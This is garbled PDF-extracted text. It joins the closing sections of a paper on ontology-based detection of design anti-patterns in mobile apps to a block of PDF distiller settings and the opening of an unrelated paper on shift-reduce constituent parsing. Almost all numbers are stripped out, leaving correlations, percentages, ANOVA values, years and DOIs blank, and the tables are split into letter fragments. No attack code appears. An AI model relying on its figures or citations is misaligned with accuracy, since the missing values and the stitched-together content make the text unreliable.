sr table ten modelio anti-patterns and their correction way. the anti-pattern the method of correction namespaces have the same name change the name of the conflicting namespaces namespace is leaf and is derived make the namespace non-final namespace is leaf and is abstract make the namespace non-final generalization between two incompatible elements change the source or the target in order to link two compatible elements a public association between two classifiers one of them is public and the other has different visibility change the visibility of the target class to public classifier has several operations with the same signature rename one of the operations or change their parameters classifier has attributes with the same name rename the classifiers attributes multiplicitymin must be inferior to multiplicitymax change the value of the minimum multiplicity to be less than the maximum multiplicity the status of an attribute is abstract and class at the same time set only one of the statuses to true a destructor has parameters remove these parameters or remove the destructor stereotype from the method elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ decreases. table presents the correlations between anti-patterns groups. the tool can detect certain group, it also can detect in parallel the other as attributes anti-patterns with operations anti-patterns. also, appearance of attributes anti-patterns in certain applications indicates the appearance of operations anti-patterns strongly. then the correlation between the five groups of anti-patterns is used to know if the existence of any type of them implies the existence of other type. there was a strong negative correlation (- . ) between namespaces anti-patterns and association anti-patterns. also, a strong positive correlation ( . ) between attributes anti-patterns and operations anti-patterns. table occurrences of the anti-patterns in the mobile apps. the group percentage of occurrences across models total # of occurrences anti-patterns in attributes . % anti-patterns in namespaces . % anti-patterns in operations . % anti-patterns in associations . % anti-patterns in the class . % total , figure the inconsistent classes using reasoner detection. full-size doi: . /peerj-cs. /fig- elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ t ab le t h e an ti -p at te rn s in ea ch ap p . m o b il e ap p c h s o n h s n n l a d n l a a g b u e c h s a m m it m m p a c p p s a a c t d h p s b in o ve r a c r s r el c o m p im p a b s t o ta l t es t d p c . . – – – – – – a va st a n d ro id m o b il e se cu ri ty – – – – f re e- c al ls - m es sa ge s – – – – – – – b ea u ti fu l g al le ry . – – – – – – – – – – – – p la y st o re – w al l p ap er – – – – – – – – – – – o as is -f en g/ is la n d – – – – – – – – – – – n et fl ix - - - -b u il d – – – – – – – – – – r em ai n d er – – – – – – – – so u n d -p ic ke r – – – – – – – – – – – – a ir -c o m m an d – – – – – – – – – – l if es u m -h ea lt h y- l if es ty le – – – – – – – b ac kg ro u n d - d ef o cu s – – – – – – – – – g as b u d d y- f in d - c h ea p -g as – – – – – – – so u n d cl o u d - m u si c- a u d io – – – – – – – – – n et w o rk -m o n it o r- m in i – – – – – – – – – – c as p er a n d ro id – – – – – – – – – – l in e – – – – – – – – d ia gn o se s – – – – – – – – – – – – v ib er – – – – – – – w h at sa p p – – – – – – – – – f ir ef o x – – – – – – – – e m ai l an d c al en d ar – – – – – – – – – – g o o gl e c am er a – – – – – – – – y o u t u b e – – – – – – – – t ru e c al le r – – – – – – – – – sa m su n g g al le ry – – – – – – – – – – t w it te r – – – – – – – – c h ro m e b ro w se r – – – – – – – – – # o f ap p ea ra n ce , elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ also, we analyzed the correlation between the detection tools of the proposed method (table ). the greatest correlations were between modelio and protégé. for assessing the direct relation between protégé and modelio, we calculated the statistical means of anti-patterns which were detected by each tool (modelio, protégé, and oled) on mobile applications as in fig. . figure shows the similarity between both the means of protégé and modelio as the result of the correlation. now, we want to statistically answer the question “do we need to use the three tools” and “is there a relation between them?” in order for statistical analysis to explain the relation among the three tools and the anti- patterns’ groups, we used the analysis of variance anova test. this is to determine whether there are any statistically significant differences between the means of anti- patterns detection by each one of the tools, and also to determine if there is any relation between anti-patterns groups and the features of mobile applications. figure the occurrences of the detected anti-patterns’ groups. full-size doi: . /peerj-cs. /fig- table the correlation among anti-patterns groups. anti-patterns correlation coefficient (r) attributes and namespaces - . attributes and operations . attributes and associations . attributes and classes . namespaces and operations - . namespaces and associations - . namespaces and classes . operations and associations . operations and classes . associations and classes . elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we use anova to calculate a test (f-ratio) with which we can obtain the probability p-value (usually taken as p < . ) suggests that at least one group mean is significantly different from the others. the null hypothesis is (all population means are equal). the alternative hypothesis is (at least one population mean is different from the rest). where the degree of freedom (df) between groups is and df within the group is . we found that the significant differences are . , . , and . for protégé, modelio, and oled, respectively. this implies that the null hypothesis is false, i.e., all the detection tools are necessary and required for the detection of the anti-patterns. the anova statistically proved that there was no concern for the features or the specifications of the applications; that is, the low f-value meant that the groups are close together relative to the variability within each group. we separated the result of integration phase because it is an optional phase. in the case of homogeneous applications, we found that the number of the detected anti-patterns in the output application was not the same. the detected anti-patterns using the ontology integration tool prompt was less than the number of anti-patterns detected by using the table the correlation among the three tools. systems correlation coefficient (r) specification modelio and ontouml - . there is a reverse correlation between modelio and ontouml modelio and protégé . there is a direct correlation between modelio and protégé protégé and ontouml - . there is a reverse correlation between protégé and ontouml editor figure the means of the detected tools. full-size doi: . /peerj-cs. /fig- elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ modelio tool. this indicates that semantic integration decreases the increases the accuracy of detecting anti-patterns in mobile applications. table shows the number of anti- patterns in each application in the integration case study (viber and whatsapp) and the number of them in the mobile application pattern after merging. the enhancement using ontology is approximately by . % in addition to a consistency check. where the formula to calculate the increasing percent between two values is percent increase ¼ second value � first valueð Þ first valueð Þ � � � ( ) substitute in eq. ( ) by the first value is the total number of anti-patterns according to using modelio = . the second value is the total number of anti-patterns according to using prompt = . then the percent is increased by ≅ . % which implies that using ontology integration by prompt (protégé plugin) instead of using uml integration by modelio increases the percent of detection. additionally, using ontology to separately refine viber or whatsapp as a pattern enhanced them approximately . % and %, respectively, in addition to a consistency check by “reasoner.” conclusions in this paper, we focused on improving the quality of mobile applications. we introduced a general method to automatically detect anti-patterns not by using specific queries, but by using modelio, oled, and protégé in a specific order to get positive results. also, concerning the related work section, our proposed method is more general than other methods as the proposed method supports semantic and structural anti-pattern detection at the design level. for evaluation of the proposed method, we applied it on a sample of mobile applications. it detected semantic and structural design anti-patterns. according to the proposed classification of anti-patterns, “the anti-patterns in the class group” was the most frequent anti-pattern, and “the anti-patterns in the attribute group” was the least frequent. from the perspective of anti-patterns detection, the analysis of results also showed that there is a correlation between the modelio and protégé platforms. also, there is no correlation between oled and protégé and no correlation between modelio and oled. table anti-patterns number before and after merging. mobile apps viber whatsapp the integrated app total (merging uml designs) # of detected anti-patterns in first method using modelio (merging ontologies) # of detected anti-patterns in second method using protégé elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we found that using ontology in the integration phase increases the detection percentage approximately by . % and guarantees consistency which is assessed by the reasoner of the ontology. accordingly, semantic ontology integration has a positive effect on the quality of the new application. this helped with developing a correct, consistent, and coherent integrated pattern that has few anti-patterns. finally, we recommend that the developer, before using any mobile application as a pattern, should check the design of the selected application against the anti-pattern. when a developer concerned with avoiding certain anti-patterns type, the correlations between anti-patterns groups, and between tools will help him. also, the proposed method considered the issues and problems of developers who are revising android applications and integrating new packages of code skill sets. a code review such as the methodology proposed could be very valuable in terms of not carrying forward existing anti-patterns and not incorporating new code flawed with poor design. the reverse deeply in owl ontology of a mobile application very useful. in the future, we are going to solve the problem of big ontologies which cannot be opened in ontology editors as protégé to complete the detection process. although, detection of anti-patterns at the design level is very useful and reduces some anti-patterns in the code level, we will refine the metric method for detecting code level anti-patterns on big ontology. also, we will create a semantic web application for anti-patterns to collect all detection tools of the two levels and anti-patterns catalog. finally, the correction phases in modelio and reasoner are still open issues. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � eman k. elsayed conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft � kamal a. eldahshan authored or reviewed drafts of the paper, approved the final draft. � enas e. el-sharawy conceived and designed the experiments, performed the experiments. � naglaa e. ghannam conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: the features of the downloaded mobile apps and the detected anti-patterns are available as a supplemental file. the file shows the relation between the detected anti-patterns and the detection tools and the relation between anti-patterns groups and the detection tools. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references afjehei ss, chen thp, tsantalis n. . iperfdetector: characterizing and detecting performance anti-patterns in ios applications. empirical software engineering : – . alharbi k, blackshear s, kowalczyk e, memon am, chang bye, yeh t. . android apps consistency scrutinized. in: chi’ extended abstracts on human factors in computing systems, april– may , toronto, ontario, canada. new york: acm, – . aljawarneh sa, alawneh a, jaradat r. . cloud security engineering. future generation computer systems : – . arnatovich yl, wang l, ngo nm, soh c. . a comparison of android reverse engineering tools via program behaviors validation based on intermediate languages transformation. ieee access : – doi . /access. . . bartussek w, weiland t, meese s, schurr mo, leenen m, uciteli a, kropf s, herre h, goller c, lauer w. . ontology-based search for risk-relevant pms data. in: biomedical engineering conference (saibmec), biennial, south african. piscataway: ieee, – . calero c, ruiz f, piattini m. eds. . ontologies for software engineering and software technology. berlin, heidelberg: springer science & business media. chatzigeorgiou a, manakos a. . investigating the evolution of bad smells in object-oriented code. in: seventh international conference on the quality of information and communications technology (quatic), porto, portugal. vol. . piscataway: ieee, – . chikofsky ej, cross jh. . reverse engineering and design recovery: a taxonomy. ieee software ( ): – doi . / . . de giacomo g, lembo d, lenzerini m, poggi a, rosati r. . using ontologies for semantic data integration. in: flesca s, greco s, masciari e, saccà d, eds. a comprehensive guide through the italian database research over the last years. cham: springer, – . eick sg, graves tl, karr af, marron js, mockus a. . does code decay? assessing the evidence from change management data. ieee transactions on software engineering ( ): – doi . / . . elsayed e, el-dahshan k, el-sharawy e, ghannam n. . semantic anti-patterns detection in uml models based on ontology catalogue. artificial intelligence and machine learning journal : – . elsayed e, el-dahshan k, ghannam n. . comparative study for detecting mobile application’s anti-patterns. in: proceedings of the th international conference on software and information engineering (icsie ) acm p : , cairo, egypt, april – . ei compendex and scopus, the british university. available at http://www.icsie.org/. elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /access. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://www.icsie.org/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ happel hj, seedorf s. . applications of ontologies in software engineering. in: proceedings of the workshop on semantic web enabled software engineering (swese) on the iswc, athens, ga, usa. – . hecht g, benomar o, rouvoy r, moha n, duchien l. a. tracking the software quality of android applications along their evolution (t). in: proceedings of the th ieee/acm international conference on automated software engineering (ase), – november , lincoln, ne, usa. piscataway: ieee, – . hecht g, moha n, rouvoy r. . an empirical study of the performance impacts of android code smells. in: proceedings of the international conference on mobile software engineering and systems, austin, – may. new york: acm, – . hecht g, rouvoy r, moha n, duchien l. b. detecting anti-patterns in android apps. in: proceedings of the nd acm international conference on mobile software engineering and systems (mobilesoft), – may . piscataway: ieee, – . ieee standard glossary of software engineering terminology-description. . ieee standard glossary of software engineering terminology. available at http://ieeexplore.ieee.org/ servlet/opac?punumber= (accessed january ). joorabchi me, ali m, mesbah a. . detecting inconsistencies in multi-platform mobile apps. in: ieee th international symposium on software reliability engineering (issre), – november . piscataway: ieee, – . kappel g, kapsammer e, kargl h, kramler g, reiter t, retschitzegger w, wimmer m. . lifting metamodels to ontologies: a step to the semantic integration of modeling languages. in: proceeding of international conference on model driven engineering languages and systems (models), genova, italy. new york: springer, – . khomh f, di penta m, guéhéneuc yg, antoniol g. . an exploratory study of the impact of antipatterns on class change- and fault-proneness. empirical software engineering ( ): – doi . /s - - -y. linares-vásquez m, klock s, mcmillan c, sabané a, poshyvanyk d, guéhéneuc yg. . domain matters: bringing further evidence of the relationships among anti-patterns, application domains, and quality-related metrics in java mobile apps. in: proceedings of the nd international conference on program comprehension, hyderabad, – june . new york: acm, – . maurice p, dhombres f, blondiaux e, friszer s, guilbaud l, lelong n, khoshnood b, charlet j, perrot n, jauniaux e, jurkovic d, jurkovic jm. . towards ontology-based decision support systems for complex ultrasound diagnosis in obstetrics and gynecology. journal of gynecology obstetrics and human reproduction ( ): – doi . /j.jogoh. . . . morales r, saborido r, khomh f, chicano f, antoniol g. . anti-patterns and the energy efficiency of android applications. arxiv preprint available at http://arxiv.org/abs/ . . obrst l, grüninger m, baclawski k, bennett m, brickley d, berg-cross g, hitzler p, janowicz k, kapp c, kutz o, lange c, levenchuk a, fran q, rector a, schneider t, spero s, thessen a, vegetti m, vizedom a, westerinen a, west m, yim pp. . semantic web and big data meet applied ontology. applied ontology ( ): – . palomba f, di nucci d, panichella a, zaidman a, de lucia a. . lightweight detection of android-specific code smells: the adoctor project. in: ieee th international conference on software analysis, evolution and reengineering (saner), – february . piscataway: ieee, – . elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://ieeexplore.ieee.org/servlet/opac?punumber= http://ieeexplore.ieee.org/servlet/opac?punumber= http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /j.jogoh. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ parnas dl. . software aging. in: proceedings of the th international conference on software engineering icse- , sorrento, – may. piscataway: ieee, – . raja v. . introduction to reverse engineering. in: raja v, fernandes k, eds. reverse engineering. springer series in advanced manufacturing. london: springer, – . romano d, raila p, pinzger m, khomh f. . analyzing the impact of anti-patterns on change-proneness using fine-grained source code changes. in: proceedings of the th working conference on reverse engineering (wcre), kingston, – october. piscataway: ieee, – . song l, tang z, li z, gong x, chen x, fang d, wang z. . appis: protect android apps against runtime repackaging attacks. in: ieee rd international conference on parallel and distributed systems (icpads), shenzhen, china. piscataway: ieee, – . yamashita a, moonen l. . exploring the impact of inter-smell relations on software maintainability: an empirical study. in: proceedings of the international conference on software engineering, san francisco, ca, usa. piscataway: ieee press, – . yus r, pappachan p. . are apps going semantic? a systematic review of semantic mobile applications. in: mobile deployment of semantic international workshop modest. bethlehem: iswc, – . zhou x, wu k, cai h, lou s, zhang y, huang g. . logpruner: detect, analyze and prune logging calls in android apps. science china information sciences ( ): – doi . /s - - -x. elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -x https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. reverse engineering approach for improving the quality of mobile applications introduction related works ontology and software engineering proposed method empirical validations results and discussion conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice shift-reduce constituent parsing with neural lookahead features jiangming liu and yue zhang singapore university of technology and design, somapah road, singapore, {jiangming liu, yue zhang}@sutd.edu.sg abstract transition-based models can be fast and accu- rate for constituent parsing. compared with chart-based models, they leverage richer fea- tures by extracting history information from a parser stack, which consists of a sequence of non-local constituents. on the other hand, during incremental parsing, constituent infor- mation on the right hand side of the current word is not utilized, which is a relative weak- ness of shift-reduce parsing. to address this limitation, we leverage a fast neural model to extract lookahead features. in particular, we build a bidirectional lstm model, which leverages full sentence information to predict the hierarchy of constituents that each word starts and ends. the results are then passed to a strong transition-based constituent parser as lookahead features. the resulting parser gives . % absolute improvement in wsj and . % in ctb compared to the baseline, giv- ing the highest reported accuracies for fully- supervised parsing. introduction transition-based constituent parsers are fast and ac- curate, performing incremental parsing using a se- quence of state transitions in linear time. pioneer- ing models rely on a classifier to make local de- cisions, searching greedily for local transitions to build a parse tree (sagae and lavie, ). zhu et al. ( ) use a beam search framework, which preserves linear time complexity of greedy search, while alleviating the disadvantage of error propaga- tion. the model gives state-of-the-art accuracies at a speed of sentences per second on the standard wsj benchmark (marcus et al., ). zhu et al. ( ) exploit rich features by extract- ing history information from a parser stack, which consists of a sequence of non-local constituents. however, due to the incremental nature of shift- reduce parsing, the right-hand side constituents of the current word cannot be used to guide the action at each step. such lookahead features (tsuruoka et al., ) correspond to the outside scores in chart parsing (goodman, ), which has been effective for obtaining improved accuracies. to leverage such information for improving shift- reduce parsing, we propose a novel neural model to predict the constituent hierarchy related to each word before parsing. our idea is inspired by the work of roark and hollingshead ( ) and zhang et al. ( b), which shows that shallow syntactic information gathered over the word sequence can be utilized for pruning chart parsers, improving chart parsing speed without sacrificing accuracies. for ex- ample, roark and hollingshead ( ) predict con- stituent boundary information on words as a pre- processing step, and use such information to prune the chart. since such information is much lighter- weight compared to full parsing, it can be predicted relatively accurately using sequence labellers. different from roark and hollingshead ( ), we collect lookahead constituent information for shift-reduce parsing, rather than pruning informa- tion for chart parsing. our main concern is improv- ing the accuracy rather than improving the speed. accordingly, our model should predict the con- stituent hierarchy for each word rather than simple boundary information. for example, in figure (a), the constituent hierarchy that the word “the” starts is “s → np”, and the constituent hierarchy that the word “table” ends is “s → vp → np → pp → np”. transactions of the association for computational linguistics, vol. , pp. – , . action editor: brian roark. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. np vb dt nn np vp s (a) (b) dt nns the students like this book adjp jj past cc and jj present np pp np dt nn the table in on word s-type e-type the [s: s np] [e: Ø ] past [s: adjp] [e: Ø ] and [s: Ø] [e: Ø ] present [s: Ø] [e: adjp ] students [s: Ø] [e: np ] like [s: vp] [e: Ø ] this [s: np np] [e: Ø ] book [s: Ø] [e: np ] on [s: pp] [e: Ø ] the [s: np] [e: Ø ] table [s: Ø [e: s vp np pp np ] figure : example constituent hierarchies for the sentence “the past and present students like this book on the table”. (a) parse tree; (b) constituent hierarchies on words. for each word, we predict both the constituent hier- archy it starts and the constituent hierarchy it ends, using them as lookahead features. the task is challenging. first, it is significantly more difficult compared to simple sequence la- belling, since two sequences of constituent hierar- chies must be predicted for each word in the input sequence. second, for high accuracies, global fea- tures from the full sentence are necessary since con- stituent hierarchies contain rich structural informa- tion. third, to retain high speed for shift-reduce parsing, lookahead feature prediction must be exe- cuted efficiently. it is highly difficult to build such a model using manual discrete features and structured search. fortunately, sequential recurrent neural networks (rnns) are remarkably effective models to encode the full input sentence. we leverage rnns for build- ing our constituent hierarchy predictor. in particular, an lstm (hochreiter and schmidhuber, ) is used to learn global features automatically from the input words. for each word, a second lstm is then used to generate the constituent hierarchies greed- ily using features from the hidden layer of the first lstm, in the same way a neural language model de- coder generates output sentences for machine trans- lation (bahdanau et al., ). the resulting model solves all three challenges raised above. for fully- supervised learning, we learn word embeddings as part of the model parameters. in the standard wsj (marcus et al., ) and ctb . tests (xue et al., ), our parser gives . f and . f improvement, respectively, over the initial state [φ, ,false, ] final state [s,n,true,m : n <= m <= n] induction rules: shift [s,i,false,k] [s|w,i+ ,false,k+ ] reduce-l/r-x [s|s s ,i,false,k] [s|x,i,false,k+ ] unary-x [s|s ,i,false,k] [s|x,i,false,k+ ] finish [s,n,false,k] [s,n,true,k+ ] idle [s,n,true,k] [s,n,true,k+ ] figure : deduction system for the baseline shift- reduce parsing process. baseline of zhu et al. ( ), resulting in a accuracy of . f for english and . f for chinese, which are the best for fully-supervised models in the literature. we release our code, based on zpar (zhang and clark, ; zhu et al., ), at https://github.com/sutdnlp/lookaheadconparser. baseline system we adopt the parser of zhu et al. ( ) for a base- line, which is based on the shift-reduce process of sagae and lavie ( ) and the beam search strat- egy of zhang and clark ( ) with global percep- tron training. . the shift-reduce system shift-reduce parsers process an input sentence in- crementally from left to right. a stack is used to maintain partial phrase-structures, while the incom- ing words are ordered in a buffer. at each step, a transition action is applied to consume an input word or construct a new phrase-structure. the set of tran- sition actions are • shift: pop the front word off the buffer, and push it onto the stack. • reduce-l/r-x: pop the top two constituents off the stack (l/r means that the head is the left constituent or the right constituent, respec- tively), combine them into a new constituent with label x, and push the new constituent onto the stack. • unary-x: pop the top constituent off the stack, raise it to a new constituent x, and push the new constituent onto the stack. • finish: pop the root node off the stack and end parsing. • idle: no-effect action on a completed state without changing items on the stack or buffer, used to ensure that the same number of actions are in each item in beam search (zhu et al., ). the deduction system for the process is shown in figure , where a state is represented as [stack, buffer front index, completion mark, action index], and n is the number of words in the input. for ex- ample, given the sentence “they like apples”, the action sequence “shift, shift, shift, reduce- l-vp, reduce-r-s” gives its syntax “(s they (vp like apples) )”. . search and training beam-search is used for decoding with the k best state items at each step being kept in the agenda. during initialization, the agenda contains only the initial state [φ, ,false, ]. at each step, each state in the agenda is popped and expanded by apply- ing all valid transition actions, and the top k re- sulting states are put back onto the agenda (zhu et al., ). the process repeats until the agenda is description templates unigram s tc,s wc,s tc,s wc,s tc s wc,s tc,s wc,q wt,q wt q wt,q wt,s lwc,s rwc s uwc,s lwc,s rwc,s uwc bigram s ws w,s ws c,s cs w,s cs c s wq w,s wq t,s cq w,s cq t q wq w,q wq t,q tq w,q tq t s wq w,s wq t,s cq w,s cq t trigram s cs cs c,s ws cs c,s cs wq t s cs cs w,s cs cq t,s ws cq t s cs wq t,s cs cq w extended s llwc,s lrwc,s luwc s rlwc,s rrwc,s ruwc s ulwc,s urwc,s uuwc s llwc,s lrwc,s luwc s rlwc,s rrwc,s ruwc table : baseline feature templates, where si rep- resents the ith item on the top of the stack and qi denotes the ith item in the front of the buffer. the symbol w denotes the lexical head of an item; the symbol c denotes the constituent label of an item; the symbol t is the pos of a lexical head; u denotes unary child; sill denotes the left child of si’s left child. empty, and the best completed state is taken as out- put. the score of a state is the total score of the transi- tion actions that have been applied to build it: c(α) = n∑ i= Φ(αi) ·~θ ( ) here Φ(αi) represents the feature vector for the ith action αi in the state item α. n is the total number of actions in α. the model parameter vector ~θ is trained online using the averaged perceptron algorithm with the early-update strategy (collins and roark, ). . baseline features our baseline features are taken from zhu et al. ( ). as shown in table , they include the un- igram, bigram, trigram features of zhang and clark ( ) and the extended features of zhu et al. ( ). templates s gs,s ge,s gs,s ge q gs,q ge,q gs,q ge table : lookahead feature templates, where si rep- resents the ith item on the top of the stack and qi de- notes the ith item in the front end of the buffer. the symbol gs and ge denote the next level constituent in the s-type hierarchy and e-type hierarchy, respec- tively. global lookahead features the baseline features suffer two limitations, as men- tioned in the introduction. first, they are relatively local to the state, considering only the neighbouring nodes of s (top of stack) and q (front of buffer). second, they do not consider lookahead information beyond s , or the syntactic structure of the buffer and sequence. we use an lstm to capture full sen- tential information in linear time, representing such global information that is fed into the baseline parser as a constituent hierarchy for each word. lookahead features are extracted from the constituent hierarchy to provide top-down guidance for bottom-up pars- ing. . constituent hierarchy in a constituency tree, each word can start or end a constituent hierarchy. as shown in figure , the word “the” starts a constituent hierarchy “s → np”. in particular, it starts a constituent s in the top level, dominating a constituent np. the word “table” ends a constituent hierarchy “s → vp → np → pp → np”. in particular, it ends a constituent hierarchy, with a constituent s on the top level, dominating a vp (starting from the word “like”), and then an np (starting from the noun phrase “this book”), and then a pp (starting from the word “in”), and finally an np (starting from the word “the”). the extraction of constituent hierarchies for each word is based on un- binarized grammars, reflecting the unbinarized trees that the word starts or ends. the constituent hier- archy is empty (denoted as φ) if the corresponding word does not start or end a constituent. the con- stituent hierarchies are added into the shift-reduce parser as soft features (section . ). formally, a constituent hierarchy is defined as [type : c → c → ... → cz], where c is a constituent label (e.g. np), “→” repre- sents the top-down hierarchy, and type can be s or e, denoting that the current word starts or ends the con- stituent hierarchy, respectively, as shown in figure . compared with full parsing, the constituent hier- archies associated with each word have no forced structural dependencies between each other, and therefore can be modelled more easily, for each word individually. being soft lookahead features rather than hard constraints, inter-dependencies are not crucial for the main parser. . lookahead features the lookahead feature templates are defined in table . in order to ensure parsing efficiency, only simple feature templates are taken into consideration. the lookahead features of a state are instantiated for the top two items on the stack (i.e., s and s ) and 